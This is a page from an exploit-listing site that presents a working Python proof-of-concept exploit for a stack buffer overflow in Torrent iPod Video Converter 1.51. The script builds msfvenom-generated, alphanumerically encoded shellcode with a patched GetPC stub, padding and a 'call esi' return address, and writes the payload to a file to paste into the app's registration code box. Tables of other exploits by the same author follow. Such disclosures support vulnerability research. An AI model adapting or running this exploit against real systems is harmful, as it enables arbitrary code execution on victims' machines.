Search for hundreds of thousands of exploits

"Torrent iPod Video Converter 1.51 - Stack Overflow"

Author

Exploit author

boku

Platform

Exploit platform

windows

Release date

Exploit published date

2020-02-11

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
# Exploit Title: Torrent iPod Video Converter 1.51 - Stack Overflow
# Exploit Author: boku
# Date: 2020-02-10
# Software Vendor: torrentrockyou
# Vendor Homepage: http://www.torrentrockyou.com
# Software Link: http://www.torrentrockyou.com/download/tripodconverter.exe
# Version: Torrent iPod Video Converter Version 1.51 Build 115
# Tested On: Windows 10 Pro (x86) 10.0.18363 Build 18363
# Recreate:
#  1) Download, install, and open Torrent iPod Video Converter
#  2) run python script & open created 'poc.txt' file
#  3) select-all > copy-all
#  4) in app, click 'Register' on the bottom
#  5) in 'Name:' textbox enter 'a'
#  6) in 'Code:' textbox paste buffer
#  7) click 'OK', calculator will open & app will crash

# ghoul@theZiggurat# msfvenom -p windows/exec CMD=calc EXITFUNC=seh --encoder x86/alpha_upper -v shellcode -f python
# x86/alpha_upper chosen with final size 447
# the decoder stubs GetPC routine includes bad characters. ESI is already at PC so no need to find it. Just remove the GetPC routine in the stub.
#shellcode = b"\x89\xe7\xda\xdc\xd9\x77\xf4\x5d\x55\x59\x49"
# echo -ne "\x89\xe7\xda\xdc\xd9\x77\xf4\x5d\x55\x59\x49" | ndisasm -
#   89E7              mov di,sp
#   DADC              fcmovu st4
#   D977F4            fnstenv [bx-0xc]
#   5D                pop bp
#   55                push bp
#   59                pop cx
#   49                dec cx
shellcode  = b'\x54\x5f' # push esp # pop edi
shellcode += b'\x56\x59' # push esi # pop ecx
shellcode += b'\x41\x90' # inc ecx # nop # Fix the offset for GetPC
shellcode += b'\x90\x90\x90\x90\x90' # keep the byte length the same
shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a"
shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30"
shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41"
shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42"
shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a"
shellcode += b"\x49\x4b\x4c\x5a\x48\x4d\x52\x45\x50\x35\x50"
shellcode += b"\x45\x50\x35\x30\x4c\x49\x4a\x45\x50\x31\x39"
shellcode += b"\x50\x33\x54\x4c\x4b\x36\x30\x30\x30\x4c\x4b"
shellcode += b"\x36\x32\x54\x4c\x4c\x4b\x50\x52\x32\x34\x4c"
shellcode += b"\x4b\x53\x42\x31\x38\x44\x4f\x38\x37\x50\x4a"
shellcode += b"\x57\x56\x30\x31\x4b\x4f\x4e\x4c\x37\x4c\x43"
shellcode += b"\x51\x43\x4c\x54\x42\x36\x4c\x57\x50\x39\x51"
shellcode += b"\x48\x4f\x34\x4d\x43\x31\x49\x57\x4d\x32\x4c"
shellcode += b"\x32\x36\x32\x31\x47\x4c\x4b\x56\x32\x44\x50"
shellcode += b"\x4c\x4b\x51\x5a\x47\x4c\x4c\x4b\x30\x4c\x44"
shellcode += b"\x51\x43\x48\x5a\x43\x57\x38\x43\x31\x48\x51"
shellcode += b"\x46\x31\x4c\x4b\x31\x49\x57\x50\x35\x51\x59"
shellcode += b"\x43\x4c\x4b\x30\x49\x34\x58\x4d\x33\x57\x4a"
shellcode += b"\x50\x49\x4c\x4b\x36\x54\x4c\x4b\x43\x31\x58"
shellcode += b"\x56\x30\x31\x4b\x4f\x4e\x4c\x39\x51\x38\x4f"
shellcode += b"\x54\x4d\x55\x51\x39\x57\x47\x48\x4b\x50\x54"
shellcode += b"\x35\x4c\x36\x45\x53\x53\x4d\x4c\x38\x47\x4b"
shellcode += b"\x43\x4d\x47\x54\x43\x45\x4d\x34\x51\x48\x4c"
shellcode += b"\x4b\x50\x58\x37\x54\x43\x31\x4e\x33\x53\x56"
shellcode += b"\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x30\x58\x45"
shellcode += b"\x4c\x55\x51\x49\x43\x4c\x4b\x43\x34\x4c\x4b"
shellcode += b"\x33\x31\x38\x50\x4d\x59\x50\x44\x57\x54\x31"
shellcode += b"\x34\x51\x4b\x51\x4b\x45\x31\x30\x59\x31\x4a"
shellcode += b"\x50\x51\x4b\x4f\x4d\x30\x31\x4f\x31\x4f\x51"
shellcode += b"\x4a\x4c\x4b\x35\x42\x5a\x4b\x4c\x4d\x31\x4d"
shellcode += b"\x52\x4a\x45\x51\x4c\x4d\x4d\x55\x4f\x42\x45"
shellcode += b"\x50\x55\x50\x35\x50\x56\x30\x45\x38\x56\x51"
shellcode += b"\x4c\x4b\x42\x4f\x4c\x47\x4b\x4f\x4e\x35\x4f"
shellcode += b"\x4b\x4b\x4e\x44\x4e\x37\x42\x4a\x4a\x45\x38"
shellcode += b"\x4f\x56\x4d\x45\x4f\x4d\x4d\x4d\x4b\x4f\x59"
shellcode += b"\x45\x37\x4c\x43\x36\x33\x4c\x34\x4a\x4d\x50"
shellcode += b"\x4b\x4b\x4b\x50\x34\x35\x35\x55\x4f\x4b\x37"
shellcode += b"\x37\x34\x53\x43\x42\x42\x4f\x53\x5a\x35\x50"
shellcode += b"\x56\x33\x4b\x4f\x4e\x35\x32\x43\x35\x31\x52"
shellcode += b"\x4c\x52\x43\x33\x30\x41\x41"

EIP_OS   = '\x41'*(4136-len(shellcode))
EIP      = '\x5a\x32\x4f' # 0x004f325a : call esi {PAGE_EXECUTE_READWRITE} [bsvideoconverter.exe] 
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.2.8.1 (C:\Program Files\Torrent IPOD Video Converter\bsvideoconverter.exe)
payload  = shellcode + EIP_OS + EIP

try:
    f=open("poc.txt","w")
    print("[+] Creating %s bytes evil payload." %len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")
Release DateTitleTypePlatformAuthor
2020-07-02"WhatsApp Remote Code Execution - Paper"webappsandroid"ashu Jaiswal"
2020-07-02"ZenTao Pro 8.8.2 - Command Injection"webappsphp"Daniel Monzón"
2020-07-02"OCS Inventory NG 2.7 - Remote Code Execution"webappsmultipleAskar
2020-07-01"Online Shopping Portal 3.1 - Authentication Bypass"webappsphp"Ümit Yalçın"
2020-07-01"e-learning Php Script 0.1.0 - 'search' SQL Injection"webappsphpKeopssGroup0day_Inc
2020-07-01"PHP-Fusion 9.03.60 - PHP Object Injection"webappsphpcoiffeur
2020-07-01"RM Downloader 2.50.60 2006.06.23 - 'Load' Local Buffer Overflow (EggHunter) (SEH) (PoC)"localwindows"Paras Bhatia"
2020-06-30"Reside Property Management 3.0 - 'profile' SQL Injection"webappsphp"Behzad Khalifeh"
2020-06-30"Victor CMS 1.0 - 'user_firstname' Persistent Cross-Site Scripting"webappsphp"Anushree Priyadarshini"
2020-06-26"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path"localwindows"Ethan Seow"
Release DateTitleTypePlatformAuthor
2020-06-16"Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path"localwindowsboku
2020-06-10"10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR)"localwindowsboku
2020-05-22"Gym Management System 1.0 - Unauthenticated Remote Code Execution"webappsphpboku
2020-05-07"Pisay Online E-Learning System 1.0 - Remote Code Execution"webappsphpboku
2020-05-01"ChemInv 1.0 - Authenticated Persistent Cross-Site Scripting"webappsphpboku
2020-05-01"Online Scheduling System 1.0 - Authentication Bypass"webappsphpboku
2020-05-01"Online Scheduling System 1.0 - Persistent Cross-Site Scripting"webappsphpboku
2020-04-20"Atomic Alarm Clock 6.3 - Stack Overflow (Unicode+SEH)"localwindowsboku
2020-04-20"Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path"localwindowsboku
2020-04-13"Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)"localwindowsboku
2020-02-17"Cuckoo Clock v5.0 - Buffer Overflow"localwindowsboku
2020-02-17"TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path"localwindowsboku
2020-02-17"BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path"localwindowsboku
2020-02-17"DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path"localwindowsboku
2020-02-14"HomeGuard Pro 9.3.1 - Insecure Folder Permissions"localwindowsboku
2020-02-14"SprintWork 2.3.1 - Local Privilege Escalation"localwindowsboku
2020-02-13"OpenTFTP 1.66 - Local Privilege Escalation"localwindowsboku
2020-02-11"Sync Breeze Enterprise 12.4.18 - 'Sync Breeze Enterprise' Unquoted Service Path"localwindowsboku
2020-02-11"FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path"localwindowsboku
2020-02-11"freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path"localwindowsboku
2020-02-11"Torrent iPod Video Converter 1.51 - Stack Overflow"localwindowsboku
2020-02-11"Disk Savvy Enterprise 12.3.18 - Unquoted Service Path"localwindowsboku
2020-02-11"Disk Sorter Enterprise 12.4.16 - 'Disk Sorter Enterprise' Unquoted Service Path"localwindowsboku
2020-01-27"Torrent 3GP Converter 1.51 - Stack Overflow (SEH)"localwindowsboku
2020-01-23"BOOTP Turbo 2.0 - Denial of Service (SEH)(PoC)"doswindowsboku
2019-12-30"Domain Quester Pro 6.02 - Stack Overflow (SEH)"localwindowsboku
2019-12-30"FTP Navigator 8.03 - Stack Overflow (SEH)"localwindowsboku
2019-12-30"AVS Audio Converter 9.1.2.600 - Stack Overflow (PoC)"localwindowsboku
2019-12-13"FTP Commander Pro 8.03 - Local Stack Overflow"localwindowsboku
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48039/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.